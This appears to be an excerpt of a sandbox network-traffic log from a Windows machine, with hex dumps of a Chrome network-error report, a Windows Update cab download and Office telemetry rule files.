                                                                                                                    2024-11-25 18:52:49 UTC1390INData Raw: 64 3a 7a 0a 00 00 00 00 00 00 00 9a 4e cc 07 00 64 23 c7 92 af 73 e2 54 f4 14 00 00 00 00 00 00 00 64 40 cc 07 00 e4 41 c9 07 00 00 00 00 00 00 c0 18 13 f3 01 00 19 50 f2 01 00 00 00 00 00 00 30 de c4 7c 00 40 d3 ad cc ce 28 f9 00 00 00 00 00 00 00 18 6f 75 f4 00 00 00 9b b8 f2 d5 d3 3b 77 f3 ee f4 b1 b5 1f da 47 a6 d7 7e b8 39 3b 93 52 5a 9c 79 75 b8 1b 2a f9 00 00 00 00 00 00 00 18 82 98 0f 00 68 b4 5f 3f fb a5 91 df b3 3b 7d 6c ea c4 a9 94 52 fd 6e c0 f7 5e 9d 94 52 4a f7 a6 94 52 5a 3a 7f 36 a5 b4 f5 7d 01 95 7c 00 00 00 00 00 00 00 0c a7 58 b8 b6 18 3d 03 00 b0 89 fb f6 76 a2 47 88 b1 74 fe ec 08 0f d8 5d 6b f8 ee 18 f0 8d 64 12 25 1f 00 00 00 00 00 8d 72 f5 fa 52 f4 08 00 c0 00 c4 7c 00 90 81 89 8d f9 e6 3f 7d 6c 24 f7 d9 4e c6 f7 5e 1b 24 7d 4a 3e
                                                                                                                    Data Ascii: d:zNd#sTd@AP0|@(ou;wG~9;RZyu*h_?;}lRn^RJRZ:6}|X=vGt]kd%rR|?}l$N^$}J>
                                                                                                                    2024-11-25 18:52:49 UTC1390INData Raw: ae 1f 7b 7c fe 33 2f 2f ef bd fd a5 86 6c ce 37 dc 19 bb 8f 3d 54 8f 7c 12 00 00 00 00 00 00 00 f2 22 e6 03 00 1a a4 78 e0 f1 bb bd 74 cb d1 ba b7 78 e5 ed 37 cf cd bd b8 33 43 6d d5 ec e5 de 70 67 ec 1e 7e a8 18 f9 30 00 00 00 00 00 00 00 e4 45 cc 07 00 34 c8 dd 4e da dd b8 e4 5b 73 e6 d2 85 1d 98 68 00 c3 6d cb 97 52 72 c6 2e 00 00 00 00 00 00 00 62 3e 00 a0 59 aa 0f 9d 79 ef af 97 6e 3e fc f8 fc 67 36 2d f9 d6 7c f9 c7 df dc 91 99 b6 60 e8 6d f9 8e 1e 70 c6 2e 00 00 00 00 00 00 00 62 3e 00 a0 c1 5e b8 7e ec 8b 57 0f 6e fd fd 51 87 ed ce 5e ee 7d e5 fc 8d e1 ae fd e3 4f b6 46 3b 0c 00 00 00 00 00 00 00 39 12 f3 01 00 cd b2 7e d2 ee 56 8e d6 bd dd 99 4b 17 76 bf e7 1b fa 80 dd e4 8c 5d 00 00 00 00 00 00 00 52 4a 29 39 d6 0d 00 68 9c 7f ff f0 0b 7f f3 fa
                                                                                                                    Data Ascii: {|3//l7=T|"xtx73Cmpg~0E4N[shmRr.b>Yyn>g6-|`mp.b>^~WnQ^}OF;9~VKv]RJ)9h
                                                                                                                    2024-11-25 18:52:49 UTC1390INData Raw: 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13
                                                                                                                    Data Ascii: @01@01@01@01@01@01@01@01@01@01


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    18192.168.2.44980535.190.80.14432304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:50 UTC474OUTPOST /report/v4?s=pNAxRHPRSwS1sTmOzA%2BuWArALfgGUee2J8LPho5vr3zWIMz39yr6Gssyy5bXrfbm%2BnFk8chGXBg4QnzklHZKhwZtCmIbAdgsiozEqExLJaLqG02fH4w5PSIy3Y4a2w%3D%3D HTTP/1.1
                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                    Connection: keep-alive
                                                                                                                    Content-Length: 432
                                                                                                                    Content-Type: application/reports+json
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    2024-11-25 18:52:50 UTC432OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 33 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6a 39 2e 76 61 6c 63 6f 6e 64 75 6e 61 72 2e 63 6f 6d 2f 62 33 6b 35 34 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 36 38 2e 31 33 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72
                                                                                                                    Data Ascii: [{"age":0,"body":{"elapsed_time":830,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://j9.valcondunar.com/b3k54/","sampling_fraction":1.0,"server_ip":"104.21.68.132","status_code":404,"type":"http.error"},"type":"network-error
                                                                                                                    2024-11-25 18:52:50 UTC168INHTTP/1.1 200 OK
                                                                                                                    Content-Length: 0
                                                                                                                    date: Mon, 25 Nov 2024 18:52:50 GMT
                                                                                                                    Via: 1.1 google
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    19192.168.2.44980652.149.20.212443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:06 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+t9dwrlzm24OzzO&MD=yBmHFA61 HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept: */*
                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                    2024-11-25 18:53:07 UTC560INHTTP/1.1 200 OK
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Expires: -1
                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                    ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                    MS-CorrelationId: f3573d38-c1ea-4950-8c7d-143ce509b0d4
                                                                                                                    MS-RequestId: 84655206-d27d-4d70-8db7-4eb2970e8437
                                                                                                                    MS-CV: FgVS/WN3p02Cgb4g.0
                                                                                                                    X-Microsoft-SLSClientCache: 1440
                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:06 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 30005
                                                                                                                    2024-11-25 18:53:07 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                    Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                    2024-11-25 18:53:07 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                    Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    20192.168.2.44980713.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:08 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:08 UTC471INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:08 GMT
                                                                                                                    Content-Type: text/plain
                                                                                                                    Content-Length: 218853
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public
                                                                                                                    Last-Modified: Sat, 23 Nov 2024 12:15:37 GMT
                                                                                                                    ETag: "0x8DD0BB889D4282C"
                                                                                                                    x-ms-request-id: 19b35b80-c01e-0049-150a-3eac27000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185308Z-15b8b599d88n8stkhC1TEBb78n0000000190000000002g64
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:08 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                    Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                    2024-11-25 18:53:08 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                    Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                    2024-11-25 18:53:09 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                    Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                    2024-11-25 18:53:09 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                    Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                    2024-11-25 18:53:09 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                    Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                    2024-11-25 18:53:09 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                    Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                    2024-11-25 18:53:09 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                    Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                    2024-11-25 18:53:09 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                    Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                    2024-11-25 18:53:09 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                    2024-11-25 18:53:09 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                    Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    21192.168.2.44981113.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:11 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:11 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:11 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 2980
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                    ETag: "0x8DC582BA80D96A1"
                                                                                                                    x-ms-request-id: 685d8613-b01e-0001-50f7-3e46e2000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185311Z-15b8b599d88tr2flhC1TEB5gk400000006f000000000av1z
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
